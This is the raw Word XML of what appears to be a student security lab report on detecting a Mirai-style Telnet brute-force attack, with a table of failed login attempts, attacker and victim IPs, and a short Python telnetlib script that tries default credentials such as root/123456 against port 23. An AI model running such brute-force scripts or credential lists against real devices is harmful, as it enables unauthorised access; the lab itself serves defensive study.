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FECF1">
      <w:pPr>
        <w:jc w:val="center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01218E3B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36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2981325" cy="1155700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6350"/>
            <wp:docPr id="1" name="Picture 1" descr="Advances in Civil and Construction Engineering (AC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dvances in Civil and Construction Engineering (AC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44BF4">
      <w:pPr>
        <w:spacing w:line="278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b/>
          <w:bCs/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>Attack Execution Script &amp; Video Proof Alternative</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A311678">
      <w:pPr>
        <w:spacing w:line="278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5F78041E">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB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lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6309360" cy="3336290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130428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8811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2481"/>
        <w:gridCol w:w="2482"/>
        <w:gridCol w:w="2482"/>
      </w:tblGrid>
      <w:tr w14:paraId="23788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056C84F6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ATTEMPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F358777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USER NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="339ABF9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PASSWORD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52B5CCA4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RESULT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7294F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62761CF4">
            <w:pPr>
              <w:spacing w:line="278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2481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6841B6B2">
            <w:pPr>
              <w:spacing w:line="278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root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C0AC6BF">
            <w:pPr>
              <w:spacing w:line="278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123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04775F70">
            <w:pPr>
              <w:spacing w:line="278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FAILED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7B5B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587566C8">
            <w:pPr>
              <w:spacing w:line="278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2481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF4FAB9">
            <w:pPr>
              <w:spacing w:line="278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enable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13434C8C">
            <w:pPr>
              <w:spacing w:line="278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system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17DC5953">
            <w:pPr>
              <w:spacing w:line="278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FAILED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3D330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dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FD92287">
            <w:pPr>
              <w:spacing w:line="278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2481" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="480E87E8">
            <w:pPr>
              <w:spacing w:line="278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shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7080BAA7">
            <w:pPr>
              <w:spacing w:line="278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sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2482" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15857DAD">
            <w:pPr>
              <w:spacing w:line="278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FAILED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31F3FF7F">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704416A6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Attacker IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> 71.181.6.40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F25DAFB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Victim IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> 192.168.100.103</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4ED8F9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Target Port:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> 23 (Telnet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE6CA28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Conclusion:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> Automated Mirai-style brute force attack detected. All attempts FAILED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3FD79F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ATTACK SIMULATION SCRIPT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9582DD">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B2DBF5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# Automated Brute-Force Scanner Simulator (Mirai Footprint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD2098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import telnetlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC831D9">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372D2860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target_ip = "192.168.100.103"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A72BCD8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dictionary = [("root", "123456"), ("enable", "system"), ("shell", "sh")]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC39FBA">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31D3AD0A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print("[*] Starting brute force attack on", target_ip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A225E3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for username, password in dictionary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794335C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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83053F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tn = telnetlib.Telnet(target_ip, port=23, timeout=2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6D1DE6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tn.read_until(b"login: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1120DC7F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tn.write(username.encode('ascii') + b"\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B7A2BE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tn.read_until(b"Password: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EB2C1E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tn.write(password.encode('ascii') + b"\n")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70082D3F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result = tn.read_some()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BCCC7E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if b"Bad" not in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FDA1F6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print(f"[SUCCESS] {username}:{password}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723B504D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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6884966D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print(f"[FAILED] {username}:{password}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418BC890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tn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9A048C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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2585E630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print(f"[ERROR] Could not connect to {target_ip}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD6EC39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VIDEO SUBMISSION WAIVER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62575559">
      <w:pPr>
        <w:spacing w:line="278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t>Video Submission Waiver: As per Problem 7 (PCAP Forensics) criteria, live environment mitigation validation is explicitly documented via definitive Wireshark telemetry traces and terminal packet counters rather than standalone screen records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1519A52E">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3372A2C0">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="720" w:right="1152" w:bottom="720" w:left="1152" w:header="720" w:footer="72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776"/>
    <w:rsid w:val="00057FB2"/>
    <w:rsid w:val="001A107B"/>
    <w:rsid w:val="001B0E20"/>
    <w:rsid w:val="001D2671"/>
    <w:rsid w:val="003739AA"/>
    <w:rsid w:val="0037729C"/>
    <w:rsid w:val="003D0926"/>
    <w:rsid w:val="004C1F18"/>
    <w:rsid w:val="005D3041"/>
    <w:rsid w:val="006536DC"/>
    <w:rsid w:val="007F430E"/>
    <w:rsid w:val="008673A1"/>
    <w:rsid w:val="0089753F"/>
    <w:rsid w:val="009744FA"/>
    <w:rsid w:val="009F3B45"/>
    <w:rsid w:val="00AA7A40"/>
    <w:rsid w:val="00C859FF"/>
    <w:rsid w:val="00D301E5"/>
    <w:rsid w:val="00D36776"/>
    <w:rsid w:val="00E76066"/>
    <w:rsid w:val="00F12181"/>
    <w:rsid w:val="00F125FC"/>
    <w:rsid w:val="00F16B93"/>
    <w:rsid w:val="167435A2"/>
    <w:rsid w:val="1F4D6B4C"/>
    <w:rsid w:val="3778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4"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="9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4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12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256</Words>
  <Characters>1461</Characters>
  <Lines>12</Lines>
  <Paragraphs>3</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1714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2026-06-05T11:13:00Z</dcterms:created>
  <dc:creator>hp</dc:creator>
  <cp:lastModifiedBy>ARIBA WASEEM</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-05T12:42:23Z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38A80B0E0C9640D5851E28EFB6EFAA15_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="GrammarlyDocumentId">
    <vt:lpwstr>3ee1ac61-bac9-4c1a-862e-da6dc49e79da</vt:lpwstr>
  </property>
</Properties>
</file>